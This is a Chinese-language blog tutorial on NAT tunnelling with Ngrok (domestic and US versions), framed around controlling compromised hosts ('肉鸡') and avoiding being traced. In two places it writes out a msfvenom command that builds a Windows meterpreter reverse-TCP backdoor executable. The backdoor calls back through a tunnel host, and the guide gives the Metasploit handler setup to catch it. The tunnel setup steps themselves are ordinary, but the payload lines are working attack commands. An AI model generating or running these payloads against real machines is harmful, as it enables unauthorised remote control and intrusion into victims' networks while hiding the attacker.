一、准备

1、意义：

在代理连接肉鸡后实现本地渗透肉鸡网络架构

2、项目：

Linux：Proxychains
Windows：Sockscap Proxifier
穿透项目：Ngrok Frp Spp Nps EW(停更)
优点：穿透加密数据，中间平台，防追踪，解决网络问题
https://www.ngrok.cc
https://github.com/esrrhs/spp
https://github.com/fatedier/frp
https://github.com/ehang-io/nps
http://www.rootkiter.com/EarthWorm

二、内网穿透

1、简介：

1、内网穿透，也即 NAT 穿透，进行 NAT 穿透是为了使具有某一个特定源 IP 地址和源端口号的数据包不被 NAT 设备屏蔽而正确路由到内网主机。下面就相互通信的主机在网络中与 NAT 设备的相对位置介绍内网穿透方法。

2、UDP 内网穿透的实质是利用路由器上的NAT 系统。NAT 是一种将私有（保留）地址转化为合法IP地址的转换技术，它被广泛应用于各种类型 Internet 接入方式和各种类型的网络中。NAT可以完成重用地址，并且对于内部的网络结构可以实现对外隐蔽
（来源百度百科）

三、Ngrok（入门上线）

1、简述：

1）作用：ngrok 是一个反向代理，通过在公共的端点和本地运行的 Web 服务器之间建立一个安全的通道。ngrok 可捕获和分析所有通道上的流量，便于后期分析和重放。通过一个命令，便可将一个本地服务器暴露在NAT或防火墙后面的互联网。

2）官方解释：ngrok是一个简化的API优先入口即服务，它增加了连接性，无需更改代码即可对您的应用程序进行安全性和可观察性

3）我的理解：

关键词：反向代理、公共、本地

通过反向代理，将局域网内的ip:port，转化为任何用户上网都可访问的URL一样

本地--->Ngrok服务器--->客户端

3）分析：

支持的协议：tcp、http、https
支持的类型：正向代理、反向代理

4）工具官网（美国的）：

ngrok - Online in One Linengrok is the fastest way to put anything onthe internet with a single command.https://ngrok.com/

5）国产二开的管理平台：

Sunny-Ngrok

Sunny-Ngrok内网转发内网穿透 - 国内内网映射服务器https://www.ngrok.cc/

2、Ngrok入门上线（国版二开）

1）注册并登陆：

Sunny-Ngrok内网转发内网穿透 - 国内内网映射服务器

点击进行注册（免费的）

2）服务端配置：
实名认证--->开通隧道--->TCP协议--->指向IP和端口--->开通隧道--->连接隧道

——————

实名认证（2块钱就可了）

填写相关信息

使用支付宝扫码，进行人脸识别

——————

开通隧道（先拿0元的试手）

——————

TCP协议--->域名进行设置--->指向IP和端口--->添加隧道--->确认开通

注意：

本地端口的填写，12.0.0.1代表localhost，紧接着的端口号是tomcat的端口号（可查看tomcat的server.xml文件中端口）

3）连接隧道：

下载客户端

根据自己的下载合适的ngrok客户端

打开ngrok客户端

输入需要启动的隧道id

实现本地的网站，可以映射到外网了

4）客户端生成后门配置监听：

msfvenom -p windows/meterpreter/reverse_tcp lhost=free.idcfengye.com lport=80 -f exe -o tcp.exe

（注：lhos：外网ip、lport：外网端口）
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 8888
run

（注：这个监听端口lport，与本地转发端口一致）

扩展：

隧道管理的地方-->修改-->修改为自定义域名

3、相关工具：

1）natapp

NATAPP -https://natapp.cn/tunnel/buy基本类似使用

2、Ngrok入门上线（美版）

1）下载：

ngrok - downloadhttps://ngrok.com/download

2）运行ngrok.exe

3）在Ngrok官网注册账号

ngrok - Online in One Linehttps://ngrok.com/在用户中心找到authtoken（账户凭证）

方法一：

4）在ngrok命令行中输入：
ngrok authtoken 加上自己的凭据配置成功会如下提示：
（创建.ngrok2文件夹、配置文件ngrok.yml）
Authtoken saved to configuration file: C:\Users\****/.ngrok2/ngrok.yml
5）连接隧道：
ngrok http 80
（指定的tcp协议，以及自己的服务端口）
方法二：

4*）配置账户
ngrok config add-authtoken 加上自己的凭据
5*）连接隧道
ngrok http 80
（指定的tcp协议，以及自己的服务端口）
6）客户端生成后门配置监听：
msfvenom -p windows/meterpreter/reverse_tcp lhost=free.idcfengye.com lport=80 -f exe -o tcp.exe

（注：lhos：外网ip、lport：外网端口）
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 8888
run

（注：这个监听端口lport，与本地转发端口一致）

【内网安全-隧道搭建】内网穿透_Ngrok上线（美版、国版二开）相关推荐

家政公司微信小程序源码运营版开源可二开含详细搭建教程
分享一个家政公司微信小程序源码完美运营版,代码开源可二开,含详细搭建教程,适合家政,保姆,保洁,维修等上门服务,含商户入驻功能. 源码下载地址:春哥技术博客-家政预约小程序源码
【内网安全-隧道搭建】内网穿透_Frp上线、测试
目录 Frp(简易上线) 1.简述: 2.工具: 3.使用: 1.准备: 2.服务端(公网): 2.客户端(内网): 3.测试方法: 4.生成后门木马监听: Frp(简易上线) 1.简述: 1)Frp ...
申请教育邮箱和使用微软 OneDrive API 和腾讯云 SCF 免费搭建个人网盘
参考注册地址注册的学校是(Red Rocks Community College官网)注册申请时需要用到参考注册地址2 国西南学院(Southwestern College) 为什么要申请教育邮箱 ...
玖乐解密垃圾某山代刷网废话不多自行看就行了可二开可运营
介绍: 玖乐解密垃圾某山代刷网全解! 废话不多自行看就行了可二开可运营垃圾代刷网没有利用价值我就只改了改部分版权! 你们想二开的速度去二开吧网盘下载地址: https://zijiewangpa ...
抖音seo源码·源代码搭建·支持二开（开源）系统
抖音seo源码搭建,抖音seo源码,抖音seo源码搭建的基础底层框架语言是后台语言PHP:python来编程开发的,抖音seo这套源码,是围绕了ai视频创意制作,六大账号矩阵发布,智能客户回复,企业号 ...
内网穿透从搭建到溯源（内网隧道搭建、绕过、隧道流量分析、日志分析、隧道防护）
背景在攻防博弈这个永久的话题中,永远不会缺少一个重要角色即内网穿透.当渗透测试人员在进入内网,需要扩大战果的时候,往往会遇到内网的一些防护策略,不外乎边界设备.防火墙及入侵检测设备对端口或者数据包的 ...
nps+Proxifier搭建socks5代理隧道进行内网穿透
目录一.实验环境搭建二.nps 服务端配置客户端配置将npc注册到系统服务三.Proxifiers使用在渗透过程中,我们需要快速实现内网穿透,从而绕过网络访问限制,直接从外网来访问内网正 ...
通过路由器搭建内网穿透隧道
通过路由器搭建内网穿透隧道将本台计算机设置为一台服务器控制面板中选择程序和功能,启用或关闭WINDOWS功能选择左边启用或关闭 Windows 功能,勾选 Internet Informatio ...
【全过程记录】将windows电脑连接到ipad的rd client远程桌面，通过路由器搭建内网穿透隧道
caiyi 2021/10/03 通过路由器搭建内网穿透隧道将本台计算机设置为一台服务器文章目录一.找到内网ip 二.找到端口号三.在ipad上同一局域网下连接四.在不同局域网下连接五.突 ...

【内网安全-隧道搭建】内网穿透_Ngrok上线（美版、国版二开）

一、准备

1、意义：

2、项目：

二、内网穿透

1、简介：

三、Ngrok（入门上线）

1、简述：

2、Ngrok入门上线（国版二开）

3、相关工具：

2、Ngrok入门上线（美版）

【内网安全-隧道搭建】内网穿透_Ngrok上线（美版、国版二开）相关推荐

最新文章

热门文章